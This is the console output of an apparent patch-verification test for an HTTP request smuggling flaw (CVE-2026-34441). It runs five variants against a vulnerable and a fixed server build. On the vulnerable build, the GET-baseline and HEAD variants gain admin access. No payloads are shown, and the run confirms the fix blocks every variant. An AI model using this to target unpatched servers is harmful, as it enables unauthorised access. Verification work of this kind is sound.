========================================== CVE-2026-34441 Variant Analysis Testing potential bypasses and variants ========================================== [INFO] Building v0.38.0 server... [INFO] v0.38.0 built successfully [INFO] Building v0.40.0 server... [INFO] v0.40.0 built successfully ========================================== TEST SUITE: Variant Analysis ========================================== --- Testing against VULNERABLE version (v0.38.0) --- [TEST] Variant: v1_get_baseline | Version: v0.38.0 First response: 179 bytes Second response: 112 bytes ADMIN ACCESS GRANTED [VULNERABLE] Smuggling detected! [TEST] Variant: v2_cl_te | Version: v0.38.0 Response: 179 bytes Response preview: b'HTTP/1.1 200 OK\r\nKeep-Alive: timeout=5, max=100\r\nContent-Length: 15\r\nContent-Type: text/html\r\nLast-Modified: Fri, 03 Apr 2026 15:03:46 GMT\r\nETag: W/"69cfd6d2-f"\r\n\r\n

INDEX

\n' [NOT VULNERABLE] No smuggling [TEST] Variant: v3_head | Version: v0.38.0 First response: 186 bytes Second response: 112 bytes ADMIN ACCESS GRANTED [VULNERABLE] Smuggling detected! [TEST] Variant: v4_oversized | Version: v0.38.0 Error: [Errno 32] Broken pipe [NOT VULNERABLE] No smuggling [TEST] Variant: v5_http10 | Version: v0.38.0 First response: 179 bytes Second response: 0 bytes [NOT VULNERABLE] No smuggling --- Testing against FIXED version (v0.40.0) --- [TEST] Variant: v1_get_baseline | Version: v0.40.0 First response: 179 bytes Second response: 0 bytes [NOT VULNERABLE] No smuggling [TEST] Variant: v2_cl_te | Version: v0.40.0 Response: 66 bytes Response preview: b'HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\nConnection: close\r\n\r\n' Got 400 Bad Request - CL+TE fix working [NOT VULNERABLE] No smuggling [TEST] Variant: v3_head | Version: v0.40.0 First response: 186 bytes Second response: 0 bytes [NOT VULNERABLE] No smuggling [TEST] Variant: v4_oversized | Version: v0.40.0 First response: 179 bytes Second response: 0 bytes [NOT VULNERABLE] No smuggling [TEST] Variant: v5_http10 | Version: v0.40.0 First response: 179 bytes Second response: 0 bytes [NOT VULNERABLE] No smuggling ========================================== SUMMARY ========================================== Variant Results (0=vulnerable, 1=not vulnerable): Variant | v0.38.0 | v0.40.0 ------------------------------ | --------------- | --------------- v1_get_baseline (original) | 0 | 1 v2_cl_te (CL+TE) | 1 | 1 v3_head (HEAD method) | 0 | 1 v4_oversized (large body) | 1 | 1 v5_http10 (HTTP/1.0) | 1 | 1 [EXIT CODE 1] No bypass found - all variants blocked by fix